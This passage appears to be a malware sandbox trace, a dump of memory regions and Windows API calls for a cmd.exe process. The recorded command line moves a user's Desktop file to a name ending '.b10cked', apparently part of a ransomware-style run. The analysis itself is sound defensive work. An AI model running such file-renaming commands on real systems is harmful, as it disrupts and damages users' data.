entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32917 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 32918 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32919 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32920 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32921 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32922 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32923 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33080 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33081 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33082 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33083 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 33084 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 33085 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33086 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33087 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33088 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33089 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33090 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33091 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33092 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33093 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33094 start_va = 0x460000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 33095 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33096 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33097 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33098 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 33099 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33100 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33101 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 33102 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 33103 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 779 os_tid = 0xed4 [0220.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfef4 | out: lpSystemTimeAsFileTime=0x1cfef4*(dwLowDateTime=0xb81cd900, dwHighDateTime=0x1d440a9)) [0220.309] GetCurrentProcessId () returned 0xe58 [0220.309] GetCurrentThreadId () returned 0xed4 [0220.309] GetTickCount () returned 0x3d7d7 [0220.309] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfeec | out: lpPerformanceCount=0x1cfeec*=27709787306) returned 1 [0220.309] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.309] __set_app_type (_Type=0x1) [0220.309] __p__fmode () returned 0x76b331f4 [0220.309] __p__commode () returned 0x76b331fc [0220.309] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.310] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.310] GetCurrentThreadId () returned 0xed4 [0220.310] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xed4) returned 0x38 [0220.310] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.310] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.310] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.310] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.310] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfe84 | out: phkResult=0x1cfe84*=0x0) returned 0x2 [0220.310] VirtualQuery (in: lpAddress=0x1cfebb, lpBuffer=0x1cfe54, dwLength=0x1c | out: lpBuffer=0x1cfe54*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.310] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfe54, dwLength=0x1c | out: lpBuffer=0x1cfe54*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.310] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfe54, dwLength=0x1c | out: lpBuffer=0x1cfe54*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.310] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfe54, dwLength=0x1c | out: lpBuffer=0x1cfe54*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.311] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfe54, dwLength=0x1c | out: lpBuffer=0x1cfe54*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0220.311] GetConsoleOutputCP () returned 0x1b5 [0220.311] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.311] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.311] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.311] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.311] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.311] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.311] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.312] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.312] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.312] GetEnvironmentStringsW () returned 0x2a0150* [0220.312] FreeEnvironmentStringsW (penv=0x2a0150) returned 1 [0220.312] GetEnvironmentStringsW () returned 0x2a0150* [0220.312] FreeEnvironmentStringsW (penv=0x2a0150) returned 1 [0220.312] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cedf4 | out: phkResult=0x1cedf4*=0x40) returned 0x0 [0220.312] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x0, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.312] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x1, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x1, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x0, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x40, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x40, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x40, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.313] RegCloseKey (hKey=0x40) returned 0x0 [0220.313] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cedf4 | out: phkResult=0x1cedf4*=0x40) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x40, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x1, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x1, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x0, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x9, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x9, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x9, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.313] RegCloseKey (hKey=0x40) returned 0x0 [0220.313] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.313] srand (_Seed=0x5b8863b6) [0220.313] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked\"" [0220.313] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked\"" [0220.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.314] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a18b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.314] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.314] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.314] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.314] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.314] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.314] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.314] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.314] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.314] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.314] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.314] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.314] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.314] GetEnvironmentStringsW () returned 0x2a22a0* [0220.315] FreeEnvironmentStringsW (penv=0x2a22a0) returned 1 [0220.315] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.315] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.315] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.315] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.315] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.315] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.315] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.315] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.315] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.315] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.315] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfbc0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.315] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfbc0, lpFilePart=0x1cfbbc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cfbbc*="Desktop") returned 0x18 [0220.315] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.315] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf93c | out: lpFindFileData=0x1cf93c) returned 0x29ffe0 [0220.315] FindClose (in: hFindFile=0x29ffe0 | out: hFindFile=0x29ffe0) returned 1 [0220.315] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf93c | out: lpFindFileData=0x1cf93c) returned 0x29ffe0 [0220.315] FindClose (in: hFindFile=0x29ffe0 | out: hFindFile=0x29ffe0) returned 1 [0220.316] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf93c | out: lpFindFileData=0x1cf93c) returned 0x29ffe0 [0220.316] FindClose (in: hFindFile=0x29ffe0 | out: hFindFile=0x29ffe0) returned 1 [0220.316] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.316] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.316] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.316] GetEnvironmentStringsW () returned 0x2a2ac0* [0220.316] FreeEnvironmentStringsW (penv=0x2a2ac0) returned 1 [0220.316] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.317] GetConsoleOutputCP () returned 0x1b5 [0220.317] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.317] GetUserDefaultLCID () returned 0x409 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfd00, cchData=128 | out: lpLCData="0") returned 2 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfd00, cchData=128 | out: lpLCData="0") returned 2 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfd00, cchData=128 | out: lpLCData="1") returned 2 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.318] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.319] GetConsoleTitleW (in: lpConsoleTitle=0x2908b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.319] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.319] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.319] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.320] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.320] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.320] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.320] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.320] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.320] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.320] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.322] GetConsoleTitleW (in: lpConsoleTitle=0x1cf9f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.484] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.485] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.485] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.485] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.485] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.485] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.485] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.485] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.485] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.485] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.485] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.485] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.485] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.485] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.485] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.485] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.485] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.485] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.485] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.485] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.485] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.485] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.485] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.485] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.485] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.485] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.485] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.485] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.485] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.485] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.485] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.485] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.485] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.485] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.485] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.487] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.487] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.487] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf7b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf7ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf7ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.488] _wcsnicmp 